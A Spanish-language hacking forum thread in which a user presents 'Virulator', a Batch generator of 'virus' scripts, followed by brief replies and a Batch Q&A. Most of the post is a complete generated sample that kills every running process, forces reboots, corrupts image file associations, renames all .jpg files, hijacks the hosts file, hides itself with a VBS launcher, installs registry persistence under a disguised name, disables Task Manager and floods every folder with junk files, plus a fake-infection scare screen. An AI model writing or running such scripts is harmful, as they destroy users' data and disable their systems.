[Batch] Virulator 1.0c

Iniciado por Eleкtro, 13 Junio 2012, 12:04 PM

0 Miembros y 1 Visitante están viendo este tema.

Eleкtro

Buf, cuantas cosas...

Virulator está un poco abandonado.

La imagen de "troyano bloqueado" es por algún código VBS que hay en el interior de virulator (No me he parado a mirar cual.)




@R4z3L.hax
REM Para ejecutar el bat en modo oculto:
REM Activar la siguiente linea manualmente...
REM Echo If not exist "%%TEMP%%\invisible.vbs" (Echo CreateObject("Wscript.Shell"^^).Run """" ^^^& WScript.Arguments(0^^) ^^^& """", 0, False^>"%TEMP%\invisible.vbs" ^& wscript "%%TEMP%%\invisible.vbs" %%0) Else (Exit)>>"%FILE%"


algunas funciones necesitar que exista el archivo "invisible vbs", elimina las letras "REM" en la última linea.

@scalverth
Tienes razón, me apunto esa!

@тαптяαпсє
Gracias por la info

Un saludo








zonahurbana

Gracias por todo este codigazo.
Tengo unas pocas preguntas ( ahora que me he animado por revisar un poco sobre esto  :silbar: )

¿.bat es la extensión de los programas escritos en Batch?

¿Por qué no se considera a Batch como un lenguaje de programación?
Es decir, ¿por qué está en la zona Scripting?

¿Este lenguaje no hace distinción entre mayúsculas y minúsculas en sus funciones verdad?

Gracias nuevamente . . .
Nunca dejar de aprender es importante, más allá del ritmo que se siga ...

Eleкtro

Hola,

Gracias pero tus preguntas no son relacionadas con el aporte, debiste crear un nuevo tema...

Citar¿.bat es la extensión de los programas escritos en Batch?
Sí. También pueden ser ".cmd" (No hay diferencia).

Citar¿Por qué no se considera a Batch como un lenguaje de programación?
¿por qué está en la zona Scripting?
Porque es un lenguaje interpretado, como todos los de scripting... En cambio VB, C, Java, y todo el resto no necesitan un intérprete para su ejecución, ya que son compilados.

100% cierto es que Batch es un lenguaje de scripting, pero si lo diferencias con el resto de lenguajes de scripting puedes apreciar como haría falta añadir otro término a la lista solamente para apartar a Batch y dejarlo ahí, porque es el más limitado en todos los aspectos respecto a los otros...

Citar¿Este lenguaje no hace distinción entre mayúsculas y minúsculas en sus funciones verdad?
Correcto.

Un saludo.

Porfavor no seguir haciendo preguntas que no tienen nada que ver con el post o lo acabaré cerrando.








Rr_bug32

....( . .)....
       -

desi


gracias
Cita de: EleKtro H@cker en 13 Junio 2012, 12:04 PM
VIRULATOR



By Elektro H@cker




Virulator es un creador de "virus" para los amantes de Batch.

Pueden crear un "virus" dañino, O un simple archivo para gastar una broma pesada (O no tán pesada).

Virulator tiene multitud de opciones y tareas variadas para añadirle a tu bomba, Además, En cada tarea hay la posibilidad de añadir tareas preconfiguradas (Y algunas son bastante divertidas xD)...
PD: No se pierdan la idea que se me ocurrió para "Que no pare de correr el reloj de windows!", Es mi tarea favorita XD, Pruebenlo, Eso deja loco a cualquiera y no es dañino :).



- Estas son las opciones principales:





- Estas son las tareas disponibles por el momento:

   

   



- También dispone de una opción para visualizar el historial de tareas, Para no perder de vista lo que vamos añadiendo...





- Esto es un ejemplo de un script generado con unas cuantas tareas de Virulator:

Código (dos) [Seleccionar]
@Echo OFF
Title sdsdsd

:: Virus creado con [Virulator 1.0]
:: By Elektro H@cker
:: No me hago repsonsable del uso de este archivo.

If not exist "%TEMP%\invisible.vbs" (Echo CreateObject("Wscript.Shell"^).Run """" ^& WScript.Arguments(0^) ^& """", 0, False>"C:\Users\ADMINI~1\AppData\Local\Temp\invisible.vbs" & wscript "%TEMP%\invisible.vbs" %0) Else (Exit)


REM Matar proceso "explorer.exe"
Taskkill /F /IM "explorer.exe" >NUL 2>&1


REM Matar todos los procesos activos del sistema
For /F "Tokens=4 delims=<>" %%X in ('wmic process get name /Format:xml ^| SORT ^| find /I ".exe" ^| Find /V /I "Taskkill" ^| Find /V /I "sort" ^| Find /V /I "cmd" ^| Find /V /I "csrss" ^| Find /V /I "conhost"') Do (Taskkill /F /T /IM "%%X" >NUL 2>&1)


REM Programar el apagado del PC en 60 segundos
Shutdown /R /T 60 /C "Soy Windows y me caes mal! No me vuelvas a encender, Noob..." /F >NUL


REM Da¤ar las extensiones de archivos de imagen
ASSOC .ani=regfile >NUL 2>&1
ASSOC .bmp=regfile >NUL 2>&1
ASSOC .cur=regfile >NUL 2>&1
ASSOC .gif=regfile >NUL 2>&1
ASSOC .ico=regfile >NUL 2>&1
ASSOC .img=regfile >NUL 2>&1
ASSOC .jpe=regfile >NUL 2>&1
ASSOC .jpg=regfile >NUL 2>&1
ASSOC .jpeg=regfile >NUL 2>&1
ASSOC .pcd=regfile >NUL 2>&1
ASSOC .png=regfile >NUL 2>&1
ASSOC .psd=regfile >NUL 2>&1
ASSOC .tga=regfile >NUL 2>&1
ASSOC .tif=regfile >NUL 2>&1
ASSOC .tiff=regfile >NUL 2>&1


REM Abrir multi instancia "notepad.exe"
Echo @echo off>>"%TEMP%\%~n0_720826398.bat"
Echo :Instance>>"%TEMP%\%~n0_720826398.bat"
Echo Start /B CMD /C "notepad.exe">>"%TEMP%\%~n0_720826398.bat"
Echo Goto :Instance>>"%TEMP%\%~n0_720826398.bat"
Start /B CMD /C "%TEMP%\%~n0_720826398.bat"


REM Mostrar mensaje "Te voy a joder el PC, Lammer!"
Echo X=msgbox("Te voy a joder el PC, Lammer!", 16,"Virus creado por Elektro H@cker")>"%TEMP%\virulator.vbs"
Start /B Wscript "%TEMP%\virulator.vbs"


REM Bloquear pagina web "google.com"
takeown /F "%windir%\System32\drivers\etc\hosts" >nul 2>&1
icacls "%windir%\System32\drivers\etc\hosts" /grant "%username%":F /T >nul 2>&1
Echo 127.0.1.1 google.com>>"%windir%\System32\drivers\etc\hosts"
Echo 127.0.1.1 www.google.com>>"%windir%\System32\drivers\etc\hosts"


REM Bucle infinito
Echo @echo off>>"%TEMP%\%~n0_2514423018.bat"
Echo :Bucle>>"%TEMP%\%~n0_2514423018.bat"
Echo Echo bucleeeeeeeee >>"%TEMP%\%~n0_2514423018.bat"
Echo Goto :Bucle>>"%TEMP%\%~n0_2514423018.bat"
Start CMD /K "%TEMP%\%~n0_2514423018.bat"


REM Ejecutar el virus al inicio del sistema "WindowsMachineSubProcess"
Copy /Y %0 "%WINDIR%\" >NUL 2>&1
Reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V "WindowsMachineSubProcess" /D "%WINDIR%\%~n0.bat" /F >NUL 2>&1  


REM Modificar fecha de Windows (Bucle infinito secuencial)
Echo :DateUP >"%TEMP%\DateUP.bat"
Echo For /L %%%%a in (2000,1,2099) Do ( >>"%TEMP%\DateUP.bat"
Echo For /L %%%%b in (1,1,12) Do ( >>"%TEMP%\DateUP.bat"
Echo For /L %%%%c in (1,1,31) Do ( >>"%TEMP%\DateUP.bat"
Echo Echo %%%%c/%%%%b/%%%%a ^| Date ^>NUL >>"%TEMP%\DateUP.bat"
Echo ping -n 1 localhost >>"%TEMP%\DateUP.bat"
Echo ) >>"%TEMP%\DateUP.bat"
Echo ) >>"%TEMP%\DateUP.bat"
Echo ) >>"%TEMP%\DateUP.bat"
Echo Goto :DateUP >>"%TEMP%\DateUP.bat"
Start /B Wscript "%TEMP%\Invisible.vbs" "%TEMP%\DateUP.bat"


REM Modificar hora de Windows (Bucle infinito secuencial)
Echo :TimeUP >"%TEMP%\TimeUP.bat"
Echo For /L %%%%a in (0,1,23) Do ( >>"%TEMP%\TimeUP.bat"
Echo For /L %%%%b in (0,1,59) Do ( >>"%TEMP%\TimeUP.bat"
Echo Time %%%%a:%%%%b >>"%TEMP%\TimeUP.bat"
Echo ping -n 1 localhost >>"%TEMP%\TimeUP.bat"
Echo ) >>"%TEMP%\TimeUP.bat"
Echo ) >>"%TEMP%\TimeUP.bat"
Echo Goto :TimeUP >>"%TEMP%\TimeUP.bat"
Start /B Wscript "%TEMP%\Invisible.vbs" "%TEMP%\TimeUP.bat"


REM Modificar el nombre del Boot de inicio "Disco C: Infectado"
label Disco C: Infectado>nul


REM Renombrar extension ".jpg" a ".txt"
FOR /R "%homedrive%\" %%X in (*.jpg) DO (Rename "%%X" "%%~nX.txt" >NUL 2>&1)


REM Hibernar el PC
RunDll32.exe powrprof.dll,SetSuspendState


REM Deshabilitar el administrador de tareas (TASKMGR.EXE)
reg add "hklm\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /T "REG_DWORD" /D "1" /f >nul
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /T "REG_DWORD" /D "1" /f >nul


REM Intercambiar los botones del mouse
Rundll32 User32.dll,SwapMouseButton


REM Fake-Virus 1 "Fake25917820"
(
echo @echo off
echo color 47
echo net stop themes 2^>nul
echo title INFECCION VIRAL PROFUNDA!
echo echo INFECCION VIRAL!!!
echo echo ERROR!!!
echo ECHO+
echo echo -
echo echo virus - TROJAN_DEMOLISHER code #45643676
echo echo -
echo PING -n 4 LOCALHOST ^>nul
echo echo FIREWALL - FALLO
echo echo -
echo PING -n 2 LOCALHOST ^>nul
echo echo ANTI-VIRUS - FALLO
echo echo -
echo PING -n 2 LOCALHOST ^>nul
echo echo DIRECCION IP - RECHAZADA
echo echo -
echo PING -n 2 LOCALHOST ^>nul
echo echo FIRMA VIRAL: ****-****-****-8894
echo echo -
echo PING -n 3 LOCALHOST ^>nul
echo cls
echo echo -
echo echo ESCANEANDO AREAS INFECTADAS...
echo echo -
echo PING -n 3 LOCALHOST ^>nul
echo set /a num=0
echo :repeat1
echo set /a num=%%num%%+1
echo echo %%num%%
echo if %%num%%==100 goto end
echo goto repeat1
echo :end
echo PING -n 1 LOCALHOST ^>nul
echo cls
echo echo -
echo echo 86.5%%%% DE MEMORIA FISICA ESTA INFECTADA
echo echo -
echo echo INFECCION FATAL!
echo PING -n 3 LOCALHOST ^>nul
echo echo -
echo ECHO LA ELIMINACION DEL DISCO INFECTADO ES NECESARIA
echo PING -n 3 LOCALHOST ^>nul
echo cls
echo echo -
echo echo ELIMINANDO PARCIALMENTE EL DISCO INFECTADO [C:]
echo echo -
echo echo PORFAVOR NO APAGUE EL SISTEMA
echo echo -
echo PING -n 4 LOCALHOST ^>nul
echo dir /b /s %%WINDIR%%\ ^| FIND /v /i "WINSXS" ^| FIND /v /i "assembly" ^| FIND /v /i "syswow64" ^| FIND /v /i "servicing"
echo cls
echo echo -
echo echo CONTENIDO DEL DISCO INFECTADO [C:] - ELIMINADO
echo echo -
echo PING -n 3 LOCALHOST ^>nul
echo cls
echo echo -
echo echo ESCANEANDO...
echo echo -
echo PING -n 2 LOCALHOST ^>nul
echo set /a num1=0
echo :repeat2
echo set /a num1=%%num1%% +1
echo echo %%num1%%
echo if %%num1%%==100 goto end1
echo goto repeat2
echo :end1
echo cls
echo PING -n 2 LOCALHOST ^>nul
echo echo -
echo echo 98.00%%%% DE MEMORIA FISICA HA SIDO DESINFECTADA
echo echo -
echo PING -n 3 LOCALHOST ^>nul
echo echo ERROR
echo echo ERROR
echo echo ERROR
echo echo ERROR
echo echo ERROR
echo echo ERROR
echo echo ERROR
echo echo ERROR
echo echo ERROR
echo echo ERROR
echo echo ERROR
echo echo ERROR
echo echo ERROR
echo echo ERROR
echo echo ERROR
echo echo ERROR
echo echo ERROR
echo echo ERROR
echo echo ERROR
echo PING -n 3 LOCALHOST ^>nul
echo cls
echo title FALLO EN EL SISTEMA
echo color 17
echo echo ERROR!
echo PING -n 2 LOCALHOST ^>nul
echo echo -
echo echo MEMORIA VIRTUAL PERDIDA!
echo PING -n 2 LOCALHOST ^>nul
echo echo -
echo echo MEMORIA FISICA SOBRECALENTADA!
echo PING -n 2 LOCALHOST ^>nul
echo echo -
echo echo PROCESADOR SOBRECALENTANDOSE!
echo PING -n 2 LOCALHOST ^>nul
echo echo -
echo ECHO LA RUPTURA TOTAL DEL SISTEMA ES INMINENTE!
echo echo -
echo PING -n 4 LOCALHOST ^>nul
echo echo -
echo echo -
echo echo -
echo echo -
echo ECHO RIESGO DE FUEGO ENCONTRADO!
echo ECHO APAGANDO EL SISTEMA PARA EVITAR PERDIDA DE DATOS
echo echo -
echo echo -
echo echo -
echo echo -
echo shutdown /R /T 60 /C "Windows ha encontrado una amenaza de virus y debe reiniciarse. Guarde todo su trabajo ahora." /F
echo PING -n 8 LOCALHOST ^>nul
echo Exit
)>%TEMP%\Fake25917820.bat
Start CMD /K %TEMP%\Fake25917820.bat


REM Propagar 100 archicos en cada carpeta del disco duro (PRECONFIGURADO)
(
echo @echo off
echo setlocal enabledelayedexpansion
echo Set File=0
echo For /F "Tokens=*" %%%%X in ('Dir /B /S /AD "%%systemdrive%%" ^| Find /V /I "Windows" ^| Find /V /I "$Recycle.Bin"'^) do (Call :COPY %%%%X^)
echo Exit
echo :Copy
echo Fsutil file createnew "%%*\%%Random%%%%Random%%%%Random%%%%Random%%%%Random%%" 1 ^>NUL 2^>^&1
echo Set /A File+=1
echo If !FILE! EQU 100 (Set /A File=0^& Goto :EOF^) ELSE (Call :COPY %%*^)
)>%TEMP%\basura.bat
Start /B %TEMP%\basura.bat




- Y por último, Aquí tienen el script:
Versión 1.0C
http://pastebin.com/raw.php?i=vqUN1g3p


(CASI)Todas las tareas han sido testeadas en Windows 7, Es muy posible que muchas tareas no funcionen en versiones anteriores de Windows (Y no tengo pensado ""dar soporte"" a esas versiones).

Opinen lo que quieran... Que a mi ya no se me ocurre que más tareas añadir :laugh:.

PD: Si encuentran algún fallo/mejora/idea reportenlo aquí para corregirlo/añadirlo porfavor  ;D.
Gracias.


Espero que os guste aunque séa un poco y lo disfruteis!
Salu2.